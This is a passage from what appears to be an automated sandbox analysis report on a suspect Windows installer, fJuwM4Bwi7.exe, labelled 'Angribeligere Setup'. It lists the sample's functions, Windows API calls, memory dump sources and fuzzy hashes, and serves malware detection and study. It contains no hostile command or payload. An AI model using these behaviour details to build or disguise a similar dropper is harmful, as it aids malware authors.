                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                        • Instruction ID: af7fd4c3fc1dda8ad1a195a9021ea177fcc43fc0d0bb539f8953ea950d20d41d
                                        • Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                        • Instruction Fuzzy Hash: DFC09B717443007BEA31DB509D49F077758A750B00F5584357320F50D0C6B4F451D62D
                                        Function 00404021 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageA.USER32(00000028,?,00000001,00403E52), ref: 0040402F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                        • Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
                                        • Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                        • Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19
                                        Function 004031CC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                        • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                        • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                        • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                        Function 0040400E Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,00403DEB), ref: 00404018
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: caaff2729d3fe7bae5ae998927534049a5cfce9e2193b3926e4c56a419af128c
                                        • Instruction ID: f87940b9544c4de7e657a104dd6f20edac94ef916c9b89b279468f5034d51d6a
                                        • Opcode Fuzzy Hash: caaff2729d3fe7bae5ae998927534049a5cfce9e2193b3926e4c56a419af128c
                                        • Instruction Fuzzy Hash: E2A01231404001DBCB014B10DF04C45FF21B7503007018030E50140034C6310420FF09
                                        Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNELBASE(00000000), ref: 004014E5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 36591f86aa2c1f2adefcdb7238d8e5e1d903d288247f27f70a02a30479273739
                                        • Instruction ID: 4daead48d26ae6742cc4751adb680189456718570d67c7320b978f12710e1ab5
                                        • Opcode Fuzzy Hash: 36591f86aa2c1f2adefcdb7238d8e5e1d903d288247f27f70a02a30479273739
                                        • Instruction Fuzzy Hash: DFD0C7B7B141006BD750E7B86E8545A73E8F75135A7148837D502E1191D17DC9415519

                                        Non-executed Functions

                                        Function 0040499C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 481windowmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 004049B4
                                        • GetDlgItem.USER32(?,00000408), ref: 004049BF
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A09
                                        • LoadBitmapA.USER32(0000006E), ref: 00404A1C
                                        • SetWindowLongA.USER32(?,000000FC,00404F93), ref: 00404A35
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A49
                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A5B
                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404A71
                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A7D
                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A8F
                                        • DeleteObject.GDI32(00000000), ref: 00404A92
                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404ABD
                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404AC9
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B5E
                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B89
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B9D
                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404BCC
                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404BDA
                                        • ShowWindow.USER32(?,00000005), ref: 00404BEB
                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404CE8
                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D4D
                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D62
                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D86
                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404DA6
                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00404DBB
                                        • GlobalFree.KERNEL32(00000000), ref: 00404DCB
                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E44
                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00404EED
                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EFC
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F1C
                                        • ShowWindow.USER32(?,00000000), ref: 00404F6A
                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F75
                                        • ShowWindow.USER32(00000000), ref: 00404F7C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N$wi
                                        • API String ID: 1638840714-531399164
                                        • Opcode ID: 48884298102dd397bd7c84c821747a4fdce173a69a1f3747addc236cef338d07
                                        • Instruction ID: ec1b41ef9246f4b5ca9c31e675ea93c5522bc938a585a88f05d0904c7564d9ec
                                        • Opcode Fuzzy Hash: 48884298102dd397bd7c84c821747a4fdce173a69a1f3747addc236cef338d07
                                        • Instruction Fuzzy Hash: 7A025FB0900209AFEB10DF94DC85AAE7BB5FB84315F10817AFA10B62E1D7789D42DF58
                                        Function 0040442A Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003FB), ref: 00404479
                                        • SetWindowTextA.USER32(00000000,?), ref: 004044A3
                                        • SHBrowseForFolderA.SHELL32(?,0041F0D0,?), ref: 00404554
                                        • CoTaskMemFree.OLE32(00000000), ref: 0040455F
                                        • lstrcmpiA.KERNEL32(Call,Angribeligere Setup: Installing), ref: 00404591
                                        • lstrcatA.KERNEL32(?,Call), ref: 0040459D
                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004045AF
                                          • Part of subcall function 0040552E: GetDlgItemTextA.USER32(?,?,00000400,004045E6), ref: 00405541
                                          • Part of subcall function 00405FA1: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\fJuwM4Bwi7.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 00405FF9
                                          • Part of subcall function 00405FA1: CharNextA.USER32(?,?,?,00000000), ref: 00406006
                                          • Part of subcall function 00405FA1: CharNextA.USER32(?,"C:\Users\user\Desktop\fJuwM4Bwi7.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 0040600B
                                          • Part of subcall function 00405FA1: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 0040601B
                                        • GetDiskFreeSpaceA.KERNEL32(0041ECC8,?,?,0000040F,?,0041ECC8,0041ECC8,?,00000000,0041ECC8,?,?,000003FB,?), ref: 0040466C
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404687
                                          • Part of subcall function 004047E0: lstrlenA.KERNEL32(Angribeligere Setup: Installing,Angribeligere Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046FB,000000DF,00000000,00000400,?), ref: 0040487E
                                          • Part of subcall function 004047E0: wsprintfA.USER32 ref: 00404886
                                          • Part of subcall function 004047E0: SetDlgItemTextA.USER32(?,Angribeligere Setup: Installing), ref: 00404899
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: A$Angribeligere Setup: Installing$C:\Users\user\AppData\Local\Temp\terephthalate\edderdun$Call$wi
                                        • API String ID: 2624150263-1536733886
                                        • Opcode ID: 460c116a5067c679cb5b5ce948a3056466bcf158c5435e38ad8be33a97865feb
                                        • Instruction ID: 5a451af96f6c61f8b8aedc9e732e962e3b59a2a539d705b9404eba0a1a8e20eb
                                        • Opcode Fuzzy Hash: 460c116a5067c679cb5b5ce948a3056466bcf158c5435e38ad8be33a97865feb
                                        • Instruction Fuzzy Hash: A6A162B1900208ABDB11AFA6CD45AEFB7B9EF85314F10843BF611B72D1D77C89418B69
                                        Function 00402645 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402654
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        • Opcode ID: 21f2deb84e4fe94a37f3c530ba23b3725dbfe4e9087708a3ee461911f2001047
                                        • Instruction ID: 2b7524724565807a685c72c68d6b6eabb337ae57375c882a310f3ed35d4a28aa
                                        • Opcode Fuzzy Hash: 21f2deb84e4fe94a37f3c530ba23b3725dbfe4e9087708a3ee461911f2001047
                                        • Instruction Fuzzy Hash: D4F0EC72504110EBD700EBB4994DAEE77B8DF51314F60457BE141F21C1D3B84945E72E
                                        Function 00404135 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041C0
                                        • GetDlgItem.USER32(00000000,000003E8), ref: 004041D4
                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041F2
                                        • GetSysColor.USER32(?), ref: 00404203
                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404212
                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404221
                                        • lstrlenA.KERNEL32(?), ref: 00404224
                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404233
                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404248
                                        • GetDlgItem.USER32(?,0000040A), ref: 004042AA
                                        • SendMessageA.USER32(00000000), ref: 004042AD
                                        • GetDlgItem.USER32(?,000003E8), ref: 004042D8
                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404318
                                        • LoadCursorA.USER32(00000000,00007F02), ref: 00404327
                                        • SetCursor.USER32(00000000), ref: 00404330
                                        • ShellExecuteA.SHELL32(0000070B,open,004226A0,00000000,00000000,00000001), ref: 00404343
                                        • LoadCursorA.USER32(00000000,00007F00), ref: 00404350
                                        • SetCursor.USER32(00000000), ref: 00404353
                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040437F
                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404393
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                        • String ID: Call$N$open$wi
                                        • API String ID: 3615053054-204474362
                                        • Opcode ID: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
                                        • Instruction ID: 47d1c741c4840d0b501b4796cf3fe0e3440e9ec9cd7b0debe1a5eac4f9bfffd7
                                        • Opcode Fuzzy Hash: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
                                        • Instruction Fuzzy Hash: 8F61A0B1A40309BFEB109F61DD45F6A7B69FB84704F108026FB04BB2D1C7B8A951CB99
                                        Function 00405A6E Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrcpyA.KERNEL32(00421A88,NUL,?,00000000,?,00000000,?,00405C12,?,?,00000001,004057B5,?,00000000,000000F1,?), ref: 00405A7E
                                        • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405C12,?,?,00000001,004057B5,?,00000000,000000F1,?), ref: 00405AA2
                                        • GetShortPathNameA.KERNEL32(00000000,00421A88,00000400), ref: 00405AAB
                                          • Part of subcall function 0040592C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 0040593C
                                          • Part of subcall function 0040592C: lstrlenA.KERNEL32(00405B5B,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 0040596E
                                        • GetShortPathNameA.KERNEL32(?,00421E88,00000400), ref: 00405AC8
                                        • wsprintfA.USER32 ref: 00405AE6
                                        • GetFileSize.KERNEL32(00000000,00000000,00421E88,C0000000,00000004,00421E88,?,?,?,?,?), ref: 00405B21
                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405B30
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B68
                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421688,00000000,-0000000A,004093A0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BBE
                                        • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405BD0
                                        • GlobalFree.KERNEL32(00000000), ref: 00405BD7
                                        • CloseHandle.KERNEL32(00000000), ref: 00405BDE
                                          • Part of subcall function 004059C7: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\fJuwM4Bwi7.exe,80000000,00000003), ref: 004059CB
                                          • Part of subcall function 004059C7: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                        • String ID: %s=%s$NUL$[Rename]
                                        • API String ID: 1265525490-4148678300
                                        • Opcode ID: 042e64ae17e7c47ef1d56a04f1dfe6ef41ae4142583f66b70c6923dd5e444e24
                                        • Instruction ID: 2d1e09aab0418ff75005a817fdb93eb8b9645243d234663ae25a64343302d3c0
                                        • Opcode Fuzzy Hash: 042e64ae17e7c47ef1d56a04f1dfe6ef41ae4142583f66b70c6923dd5e444e24
                                        • Instruction Fuzzy Hash: BE41DEB1604A15BFD6206B219C49F6B3A6CDF45718F14053BBE01FA2D2EA7CB8018E7D
                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                        Download Yara Rule
                                        APIs
                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
                                        • Instruction ID: ce5436bc7dfccdabf5b2378cdbc04c65b8fc1f8d51739f20964cb8902a5fcb59
                                        • Opcode Fuzzy Hash: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
                                        • Instruction Fuzzy Hash: F2419A72804249AFCF058F94CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5
                                        Function 00405FA1 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\fJuwM4Bwi7.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 00405FF9
                                        • CharNextA.USER32(?,?,?,00000000), ref: 00406006
                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\fJuwM4Bwi7.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 0040600B
                                        • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 0040601B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
